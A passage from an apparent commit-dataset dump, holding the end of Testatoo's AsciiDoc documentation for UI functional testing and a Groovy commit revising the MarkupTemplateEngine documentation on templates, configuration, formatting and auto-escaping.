maleRadio.is(unchecked) and maleRadio.has label('Male')\n femaleRadio.is(unchecked) and femaleRadio.has label('Female')\n}\n\ncheck maleRadio\nassertThat maleRadio is checked\nassertThat femaleRadio is unchecked\n\ncheck femaleRadio\nassertThat femaleRadio is checked\nassertThat maleRadio is unchecked\n-------------------------------------------------------------------------------\n\nPretty close isn't it ;)\n\nTestatoo provides a DSL to write tests in a natural language easy to manipulate for a specifications point of view.\nAs this is a high level language, it allows tests to be written before UI coding.\n\nYES, for the first time with Testatoo you can write UI functional test FIRST (yeah, it's pretty cool)\n\n\n\n\n\n\n\n\n\n","old_contents":"= Testatoo documentation\nv2.0, 2014\n:toc:\n:doctype: book\n:icons: font\n:homepage: https:\/\/github.com\/Ovea\/testatoo\n:desc: This is the documentation of Testatoo\n:testaoo-version: 2.0.b1\n\n:source-highlighter: highlightjs\n:imagesdir: images\n\nimage:logo.png[float=\"left\"]\n\n== Introduction\n\nTestatoo is a web user interface testing tool. It's the result of numerous real-world observations of developers in the trenches in the area of GUI testing.\nWorking for many years to promote the TDD approaches, we often faced difficulties in their implementation for the graphical layer of applications.\n\nThe \"test FIRST\" principle excludes all scenario recorder based approaches that only allow you to write a posteriori tests.\nOur experience has taught us that this path is a dead end (but we reserve this for another discussion...).\n\nAnother problem is UI tests are brittle and costly! We do think that this is due to the lack of abstraction in existing UI testing tools.\n\nTestatoo provides on one hand an abstraction of the UI business domain through an expressive API and on the other hand a way to express this domain via a DSL (a button semantically stays a buttons whatever the technology).\nWith Testatoo you can therefore write tests with a seldom achieved level of expressiveness and make these tests INDEPENDENT of the underlying technology.\n\nTestatoo can therefore transform the test in real assets, present throughout the life of the application and always in tune with the latest version of the application.\n\n== Technologies\n\nTestatoo is built on top of http:\/\/code.google.com\/p\/selenium\/[WebDriver], it can work with any browser supported by https:\/\/code.google.com\/p\/selenium\/wiki\/FrequentlyAskedQuestions[WebDriver] (IE, Google-chrome, Firefox, ...).\nIf Testatoo provides, like http:\/\/www.gebish.org\/testing[geb], an extra layer of convenience and productivity. It's always possible to \"fallback\" to the WebDriver level to do something directly should you need to.\nBut Testatoo adds a powerful DSL while maintaining the usage of Groovy and keeps the advantage of a strong typed language.\n\nExample of a test syntax :\n\n[source, groovy]\n-------------------------------------------------------------------------------\n assertThat textField has label('myLabel')\n assertThat textField has placeholder('My placeholder')\n assertThat textField is empty\n-------------------------------------------------------------------------------\n\n== Why should I use Testatoo\n\nIf you don't use Testatoo for your UI tests it's like you \"Knocking On Heaven's Door\".\n\n== Installation & Usage (I want to ride my bicycle)\n\nOne snipet of code is worth a thousand words\nSo go ......\n\nGet Testatoo and dependencies libraries via Maven\u2026\n\n[source, xml]\n-------------------------------------------------------------------------------\n<dependency>\n <groupId>org.testatoo<\/groupId>\n <artifactId>testatoo-core<\/artifactId>\n <version>{testaoo-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>junit<\/groupId>\n <artifactId>junit<\/artifactId>\n <version>4.11<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.seleniumhq.selenium<\/groupId>\n <artifactId>selenium-java<\/artifactId>\n <version>2.39.0<\/version>\n <scope>test<\/scope>\n<\/dependency>\n-------------------------------------------------------------------------------\n\nTestatoo work with existing popular unit test libraries like JUnit.\nIn our first test (BaseGoogleTest) we test a simple search on Google.\n\nThe test looks like :\n\n[source, groovy]\n-------------------------------------------------------------------------------\npackage starter\n\nimport org.junit.AfterClass\nimport org.junit.BeforeClass\nimport org.junit.Test\nimport org.junit.runner.RunWith\nimport org.junit.runners.JUnit4\nimport org.openqa.selenium.firefox.FirefoxDriver\nimport org.testatoo.core.Testatoo\nimport org.testatoo.core.component.Button\nimport org.testatoo.core.component.input.TextField\nimport org.testatoo.core.component.list.ListView\nimport org.testatoo.core.evaluator.webdriver.WebDriverEvaluator\n\nimport static org.testatoo.core.Testatoo.*\nimport static org.testatoo.core.input.Mouse.*\nimport static org.testatoo.core.property.Properties.*\nimport static org.testatoo.core.state.States.*\n\n@RunWith(JUnit4)\nclass BaseGoogleTest {\n\n @BeforeClass\n public static void setup() {\n Testatoo.evaluator = new WebDriverEvaluator(new FirefoxDriver())\n open 'http:\/\/www.google.com'\n }\n @AfterClass public static void tearDown() { evaluator.close() }\n\n @Test\n public void simple_test() {\n TextField searchField = $('#gbqfq') as TextField\n Button searchButton = $('#gbqfb') as Button\n ListView resultList = $('#rso') as ListView\n\n assertThat resultList is missing\n assertThat searchField is visible\n\n on searchField enter 'Testatoo'\n clickOn searchButton\n\n waitUntil {resultList.is visible}\n\n assertThat resultList.items[0] has value.containing('Testatoo')\n }\n\n}\n-------------------------------------------------------------------------------\n\nIf you run the test it should process a simple search on google engine.\nSome interesting element can be show in this test :\n\nTestatoo work with Strongly typed components:: Testatoo manipulate typed components like TextField, Button, ListView.\n The power of Testatoo is in one hand to provide a rich list of components and on the other one the possibility\n to easily create and compose your own components set.\n\nTestatoo use deferred evaluation:: As you can see we instantiate a ListView event if the component is not available in the page.\n You can test if the component is missing\n\nTestatoo DSL is very clean and functional:: Testatoo is based on a clear and powerful syntax.\nTestatoo code never refer to a technical layer:: Under no circumstances in this test the underline DOM technology transpire in our code.\n\n[NOTE]\n===============================\nAs a rule when you create a test with Testatoo we recommend to add some default import to facilitate the automatic completion on your favorite IDE(A).\n\n[source, groovy]\n-------------------------------------------------------------------------------\n\nimport static org.testatoo.core.Testatoo.*\nimport static org.testatoo.core.input.Mouse.*\nimport static org.testatoo.core.property.Properties.*\nimport static org.testatoo.core.state.States.*\n\n-------------------------------------------------------------------------------\n===============================\n\n== Back to the future\n\nWell well well (My Michelle), as explained Testatoo is library to write functional test. Functional test mean SPECIFICATION.\n\nAs a SPECIFIER I want to express my test (intention) BEFORE to code my UI. So if the intention is to have\na page with two radio buttons to select the gender (male or female). The test can be expressed like this :\n\n-------------------------------------------------------------------------------\nassert that the maleRadio is unchecked\nand it has label \"Male\"\n\nassert that the femaleRadio is unchecked\nand it has label \"Female\"\n\ncheck the maleRadio\nassert that the maleRadio is checked\nassert that the femaleRadio is unchecked\n\ncheck the femaleRadio\nassert that the femaleRadio checked\nassert that the maleRadio is unchecked\n-------------------------------------------------------------------------------\n\nThe Testatoo syntax to express this specification is :\n\n[source, groovy]\n-------------------------------------------------------------------------------\nassertThat {\n maleRadio.is(unchecked) and maleRadio.has label('Male')\n femaleRadio.is(unchecked) and femaleRadio.has label('Female')\n}\n\ncheck maleRadio\nassertThat maleRadio is checked\nassertThat femaleRadio is unchecked\n\ncheck femaleRadio\nassertThat femaleRadio is checked\nassertThat maleRadio is unchecked\n-------------------------------------------------------------------------------\n\nPretty close isn't it ;)\n\nTestatoo provides a DSL to write tests in a natural language easy to manipulate for a specifications point of view.\nAs this is a high level language, it allows tests to be written before UI coding.\n\nYES, for the first time with Testatoo you can write UI functional test FIRST (yeah, it's pretty cool)\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8823d90ac0bee4b737a865ac41ffd3e472efaf8f","subject":"Make it clear that the template engine can be used to render any text based content","message":"Make it clear that the template engine can be used to render any text based content\n","repos":"yukangguo\/incubator-groovy,rlovtangen\/groovy-core,graemerocher\/incubator-groovy,jwagenleitner\/groovy,paulk-asert\/incubator-groovy,shils\/incubator-groovy,pickypg\/incubator-groovy,alien11689\/incubator-groovy,graemerocher\/incubator-groovy,sagarsane\/incubator-groovy,shils\/incubator-groovy,adjohnson916\/incubator-groovy,alien11689\/groovy-core,antoaravinth\/incubator-groovy,sagarsane\/incubator-groovy,kenzanmedia\/incubator-groovy,alien11689\/incubator-groovy,apache\/groovy,fpavageau\/groovy,armsargis\/groovy,aaronzirbes\/incubator-groovy,sagarsane\/groovy-core,ebourg\/incubator-groovy,paulk-asert\/groovy,sagarsane\/groovy-core,pledbrook\/incubator-groovy,genqiang\/incubator-groovy,taoguan\/incubator-groovy,bsideup\/incubator-groovy,ebourg\/incubator-groovy,PascalSchumacher\/incubator-groovy,groovy\/groovy-core,christoph-frick\/groovy-core,antoaravinth\/incubator-groovy,PascalSchumacher\/incubator-groovy,mariogarcia\/groovy-core,dpolivaev\/groovy,adjohnson916\/groovy-core,jwagenleitner\/incubator-groovy,avafanasiev\/groovy,armsargis\/groovy,armsargis\/groovy,sagarsane\/incubator-groovy,christoph-frick\/groovy-core,shils\/groovy,ebourg\/incubator-groovy,pledbrook\/incubator-groovy,tkruse\/incubator-groovy,apache\/incubator-groovy,pledbrook\/incubator-groovy,adjohnson916\/incubator-groovy,armsargis\/groovy,ebourg\/incubator-groovy,paulk-asert\/incubator-groovy,bsideup\/groovy-core,apache\/incubator-groovy,aaronzirbes\/incubator-groovy,graemerocher\/incubator-groovy,avafanasiev\/groovy,paulk-asert\/groovy,gillius\/incubator-groovy,adjohnson916\/groovy-core,guangying945\/incubator-groovy,mariogarcia\/groovy-core,kidaa\/incubator-groovy,genqiang\/incubator-groovy,i55ac\/incubator-groovy,EPadronU\/incubator-groovy,mariogarcia\/groovy-core,ChanJLee\/incubator-groovy,antoaravinth\/incubator-groovy,samanalysis\/incubator-groovy,upadhyayap\/incubator-groovy,i55ac\/incubator-groovy,paulk-asert\/incubator-groovy,christoph-frick\/groovy-core,adjohnson916\/incubator-groovy,alien11689\/groovy-core,eginez\/incubator-groovy,EPadronU\/incubator-groovy,aaronzirbes\/incubator-groovy,adjohnson916\/incubator-groovy,aaronzirbes\/incubator-groovy,guangying945\/incubator-groovy,genqiang\/incubator-groovy,avafanasiev\/groovy,upadhyayap\/incubator-groovy,samanalysis\/incubator-groovy,nkhuyu\/incubator-groovy,russel\/groovy,PascalSchumacher\/incubator-groovy,ChanJLee\/incubator-groovy,dpolivaev\/groovy,gillius\/incubator-groovy,paulk-asert\/incubator-groovy,traneHead\/groovy-core,sagarsane\/groovy-core,alien11689\/groovy-core,kenzanmedia\/incubator-groovy,alien11689\/incubator-groovy,shils\/groovy,paulk-asert\/incubator-groovy,kidaa\/incubator-groovy,russel\/groovy,paplorinc\/incubator-groovy,shils\/incubator-groovy,alien11689\/groovy-core,apache\/groovy,eginez\/incubator-groovy,bsideup\/groovy-core,samanalysis\/incubator-groovy,paulk-asert\/groovy,ebourg\/groovy-core,rabbitcount\/incubator-groovy,ebourg\/groovy-core,yukangguo\/incubator-groovy,pledbrook\/incubator-groovy,sagarsane\/incubator-groovy,shils\/groovy,i55ac\/incubator-groovy,rlovtangen\/groovy-core,tkruse\/incubator-groovy,ebourg\/groovy-core,adjohnson916\/groovy-core,groovy\/groovy-core,shils\/groovy,apache\/incubator-groovy,jwagenleitner\/incubator-groovy,adjohnson916\/groovy-core,christoph-frick\/groovy-core,yukangguo\/incubator-groovy,mariogarcia\/groovy-core,i55ac\/incubator-groovy,bsideup\/incubator-groovy,paplorinc\/incubator-groovy,PascalSchumacher\/incubator-groovy,groovy\/groovy-core,russel\/incubator-groovy,EPadronU\/incubator-groovy,jwagenleitner\/incubator-groovy,guangying945\/incubator-groovy,groovy\/groovy-core,apache\/groovy,nkhuyu\/incubator-groovy,alien11689\/groovy-core,graemerocher\/incubator-groovy,nobeans\/incubator-groovy,ChanJLee\/incubator-groovy,aim-for-better\/incubator-groovy,taoguan\/incubator-groovy,jwagenleitner\/incubator-groovy,adjohnson916\/groovy-core,nobeans\/incubator-groovy,dpolivaev\/groovy,rlovtangen\/groovy-core,rabbitcount\/incubator-groovy,paplorinc\/incubator-groovy,fpavageau\/groovy,dpolivaev\/groovy,apache\/incubator-groovy,groovy\/groovy-core,EPadronU\/incubator-groovy,gillius\/incubator-groovy,russel\/groovy,rabbitcount\/incubator-groovy,russel\/incubator-groovy,shils\/incubator-groovy,rlovtangen\/groovy-core,rabbitcount\/incubator-groovy,eginez\/incubator-groovy,kidaa\/incubator-groovy,sagarsane\/groovy-core,aim-for-better\/incubator-groovy,paplorinc\/incubator-groovy,upadhyayap\/incubator-groovy,jwagenleitner\/groovy,russel\/incubator-groovy,traneHead\/groovy-core,samanalysis\/incubator-groovy,upadhyayap\/incubator-groovy,eginez\/incubator-groovy,kenzanmedia\/incubator-groovy,pickypg\/incubator-groovy,bsideup\/groovy-core,nkhuyu\/incubator-groovy,jwagenleitner\/groovy,apache\/groovy,genqiang\/incubator-groovy,guangying945\/incubator-groovy,avafanasiev\/groovy,russel\/incubator-groovy,kidaa\/incubator-groovy,christoph-frick\/groovy-core,nkhuyu\/incubator-groovy,taoguan\/incubator-groovy,mariogarcia\/groovy-core,aim-for-better\/incubator-groovy,yukangguo\/incubator-groovy,sagarsane\/groovy-core,paulk-asert\/groovy,alien11689\/incubator-groovy,gillius\/incubator-groovy,fpavageau\/groovy,aim-for-better\/incubator-groovy,traneHead\/groovy-core,nobeans\/incubator-groovy,ebourg\/groovy-core,pickypg\/incubator-groovy,tkruse\/incubator-groovy,jwagenleitner\/groovy,bsideup\/incubator-groovy,rlovtangen\/groovy-core,fpavageau\/groovy,PascalSchumacher\/incubator-groovy,tkruse\/incubator-groovy,traneHead\/groovy-core,nobeans\/incubator-groovy,kenzanmedia\/incubator-groovy,taoguan\/incubator-groovy,ebourg\/groovy-core,ChanJLee\/incubator-groovy,antoaravinth\/incubator-groovy,bsideup\/groovy-core,pickypg\/incubator-groovy,russel\/groovy,bsideup\/incubator-groovy","old_file":"subprojects\/groovy-templates\/src\/spec\/doc\/markup-template-engine.adoc","new_file":"subprojects\/groovy-templates\/src\/spec\/doc\/markup-template-engine.adoc","new_contents":"= The MarkupTemplateEngine\n\nThis template engine is a template engine primarily aimed at generating XML-like markup (XML, XHTML, HTML5, ...), but that\ncan be used to generate any text based content. Unlike traditional template engines, this one relies on a DSL that uses the\nbuilder syntax. Here is a sample template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_template,indent=0]\n----\n\nIf you feed it with the following model:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_model,indent=0]\n----\n\nIt would be rendered as:\n\n[source,xml]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_expected,indent=0]\n----\n\nThe key features of this template engine are:\n\n* a _markup builder like_ syntax\n* templates are compiled into bytecode\n* fast rendering\n* optional type checking of the model\n* includes\n* internationalization support\n\n== The template format\n=== Basics\n\nTemplates consist of Groovy code. Let's explore the first example more throughfully:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_template_with_bullets,indent=0]\n----\n<1> renders the XML declaration string.\n<2> opens a `cars` tag\n<3> `cars` is a variable found in the _template model_, which is a list of `Car` instances\n<4> for each item, we create a `car` tag with the attributes from the `Car` instance\n<5> closes the `cars` tag\n\nAs you can see, regular Groovy code can be used in the template. Here, we are calling `each` on a list (retrieved from the model), allowing us to\nrender one `car` tag per entry.\n\nIn a similar fashion, rendering HTML code is as simple as this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example2_template,indent=0]\n----\n<1> renders the HTML doctype special tag\n<2> opens the `html` tag with an attribute\n<3> opens the `head` tag\n<4> renders a `meta` tag with one `http-equiv` attribute\n<5> renders the `title` tag\n<6> closes the `head` tag\n<7> opens the `body` tag\n<8> renders a `p` tag\n<9> closes the `body` tag\n<10> closes the `html` tag\n\nThe output is straightforward:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example2_expected,indent=0]\n----\n\nNOTE: With some <<markuptemplate-config,configuration>>, you can have the output pretty printed, with newlines and indent automatically added.\n\n=== Support methods\n\nIn the previous example, the doctype declaration was rendered using the `yieldUnescaped` method. We have also seen the `xmlDeclaration` method.\nThe template engine provides several support methods that will help you render contents appropriately:\n\n[cols=\"1,2,3a\",options=\"header\"]\n|=======================================================================\n|Method|Description|Example\n|yield\n|Renders contents, but escapes it before rendering\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yield,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yield_expected,indent=0]\n```\n|yieldUnescaped\n|Renders raw contents. The argument is rendered as is, without escaping.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yieldUnescaped,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yieldUnescaped_expected,indent=0]\n```\n\n|xmlDeclaration\n|Renders an XML declaration String. If the encoding is specified in the configuration, it is written in the declaration.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_expected,indent=0]\n```\n\nIf `TemplateConfiguration#getDeclarationEncoding` is not null:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_encoding_expected,indent=0]\n```\n\n|comment\n|Renders raw contents inside an XML comment\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=comment,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=comment_expected,indent=0]\n```\n\n|newLine\n|Renders a new line. See also `TemplateConfiguration#setAutoNewLine` and `TemplateConfiguration#setNewLineString`.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newline,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newline_expected,indent=0]\n```\n\n|pi\n|Renders an XML processing instruction.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=pi,indent=0]\n```\n\n*Output*:\n```xml\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=pi_expected,indent=0]\n```\n\n|tryEscape\n|Returns an escaped string for an object, if it is a `String` (or any type derived from `CharSequence`). Otherwise returns the object itself.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=tryEscape,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=tryEscape_expected,indent=0]\n```\n\n|=======================================================================\n\n=== Includes\n\nThe `MarkupTemplateEngine` supports inclusion of contents from another file. Included contents may be:\n\n* another template\n* raw contents\n* contents to be escaped\n\nIncluding another template can be done using:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_template,indent=0]\n----\n\nIncluding a file as raw contents, without escaping it, can be done like this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_raw,indent=0]\n----\n\nEventually, inclusion of text that should be escaped before rendering can be done using:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_escaped,indent=0]\n----\n\nAlternatively, you can use the following helper methods instead:\n\n* `includeGroovy(<name>)` to include another template\n* `includeEscaped(<name>)` to include another file with escaping\n* `includeUnescaped(<name>)` to include another file without escaping\n\nCalling those methods instead of the `include xxx:` syntax can be useful if the name of the file to be included is dynamic (stored in a variable for example).\nFiles to be included (independently of their type, template or text) are found on *classpath*. This is one of the reasons why the `MarkupTemplateEngine` takes\nan optional `ClassLoader` as constructor argument (the other reason being that you can include code referencing other classes in a template).\n\nIf you don't want your templates to be on classpath, the `MarkupTemplateEngine` accepts a convenient constructor that lets you define the directory where\ntemplates are to be found.\n\n== Rendering contents\n=== Creation of a template engine\nOn the server side, rendering templates require an instance of `groovy.text.markup.MarkupTemplateEngine` and a\n`groovy.text.markup.TemplateConfiguration`:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=rendering_setup,indent=0]\n----\n<1> creates a template configuration\n<2> creates a template engine with this configuration\n<3> creates a template instance from a `String`\n<4> creates a model to be used in the template\n<5> bind the model to the template instance\n<6> render output\n\nThere are several possible options to parse templates:\n\n* from a `String`, using `createTemplate(String)`\n* from a `Reader`, using `createTemplate(Reader)`\n* from a `URL`, using `createTemplate(URL)`\n* given a template name, using `createTemplateByPath(String)`\n\nThe last version should in general be preferred:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=rendering_by_name,indent=0]\n----\n\n[[markuptemplate-config]]\n=== Configuration options\n\nThe behavior of the engine can be tweaked with several configuration options accessible through the `TemplateConfiguration` class:\n\n[cols=\"1,1,2,3a\",options=\"header\"]\n|=======================================================================\n|Option|Default value|Description|Example\n|declarationEncoding\n|null\n|Determines the value of the encoding to be written when `xmlDeclaration` is called. It does *not* influence the writer you are using as output.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_expected,indent=0]\n```\n\nIf `TemplateConfiguration#getDeclarationEncoding` is not null:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_encoding_expected,indent=0]\n```\n\n|expandEmptyElements\n|false\n|If true, empty tags are rendered in their expanded form.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements_false,indent=0]\n```\n\nIf `expandEmptyElements` is true:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements_true,indent=0]\n```\n\n|useDoubleQuotes\n|false\n|If true, use double quotes for attributes instead of simple quotes\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes_false,indent=0]\n```\n\nIf `useDoubleQuotes` is true:\n\n*Output*:\n```xml\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes_true,indent=0]\n```\n\n|newLineString\n|System default (system property `line.separator`)\n|Allows to choose what string is used when a new line is rendered\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newLineString,indent=0]\n```\n\nIf `newLineString='BAR'`:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newLineString_expected,indent=0]\n```\n\n|autoEscape\n|false\n|If true, variables from models are automatically escaped before rendering.\n|See <<markuptemplate-autoescape, the auto escape section>>\n\n|autoIndent\n|false\n|If true, performs automatic indentation after new lines\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|autoIndentString\n|four (4) spaces\n|The string to be used as indent.\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|autoNewLine\n|false\n|If true, performs automatic insertion of new lines\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|baseTemplateClass\n|`groovy.text.markup.BaseTemplate`\n|Sets the super class of compiled templates. This can be used to provide application specific templates.\n|See <<markuptemplate-basetemplate, the custom templates section>>\n\n|locale\n|Default locale\n|Sets the default locale for templates.\n|See <<markuptemplate-i18n, the internationalization section>>\n\n|=======================================================================\n\nWARNING: Once the template engine has been created, it is *unsafe* to change the configuration.\n\n[[markuptemplate-autoformat]]\n=== Automatic formatting\n\nBy default, the template engine will render output without any specific formatting. Some <<markuptemplate-config,configuration options>> can improve the situation:\n\n* `autoIndent` is responsible for auto-indenting after a new line is inserted\n* `autoNewLine` is responsible for automatically inserting new lines based on the original formatting of the template source\n\nIn general, it is recommanded to set both `autoIndent` and `autoNewLine` to true if you want human-readable, pretty printed, output:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_setup,indent=0]\n----\n\nUsing the following template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template,indent=0]\n----\n\nThe output will now be:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template_expected,indent=0]\n----\n\nWe can slightly change the template so that the `title` intruction is found on the same line as the `head` one:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template2,indent=0]\n----\n\nAnd the output will reflect that:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template2_expected,indent=0]\n----\n\nNew lines are *only* inserted where curly braces for tags are found, and the insertion corresponds to where the nested content is found. This means that\ntags in the body of another tag will *not* trigger new lines unless they use curly braces themselves:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template3,indent=0]\n----\n<1> a new line is inserted because `meta` is not on the same line as `head`\n<2> no new line is inserted, because we're on the same depth as the previous tag\n<3> we can force rendering of a new line by explicitly calling `newLine`\n<4> and this tag will be rendered on a separate line\n\nThis time, the output will be:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template3_expected,indent=0]\n----\n\nBy default, the renderer uses four(4) spaces as indent, but you can change it by setting the `TemplateConfiguration#autoIndentString` property.\n\n[[markuptemplate-autoescape]]\n=== Automatic escaping\n\nBy default, contents which is read from the model is rendered *as is*. If this contents comes from user input, it can be sensible, and you might\nwant to escape it by default, for example to avoid XSS injection. For that, the template configuration provides an option which will automatically\nescape objects from the model, as long as they inherit from `CharSequence` (typically, `String`s).\n\nLet's imagine the following setup:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_setup,indent=0]\n----\n\nand the following template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template,indent=0]\n----\n\nThen you wouldn't want the HTML from `unsafeContents` to be rendered as is, because of potential security issues:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_expected,indent=0]\n----\n\nAutomatic escaping will fix this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_setup_fixed,indent=0]\n----\n\nAnd now the output is properly escaped:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_fixed_expected,indent=0]\n----\n\nNote that using automatic escaping doesn't prevent you from including unescaped contents from the model. To do this, your template should then explicitly\nmention that a model variable should not be escaped by prefixing it with `unescaped.`, like in this example:\n\n[source,html]\n.Explicit bypass of automatic escaping\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_unescaped,indent=0]\n----\n\n[[markuptemplate-i18n]]\n=== Internationalization\n\nThe template engine has 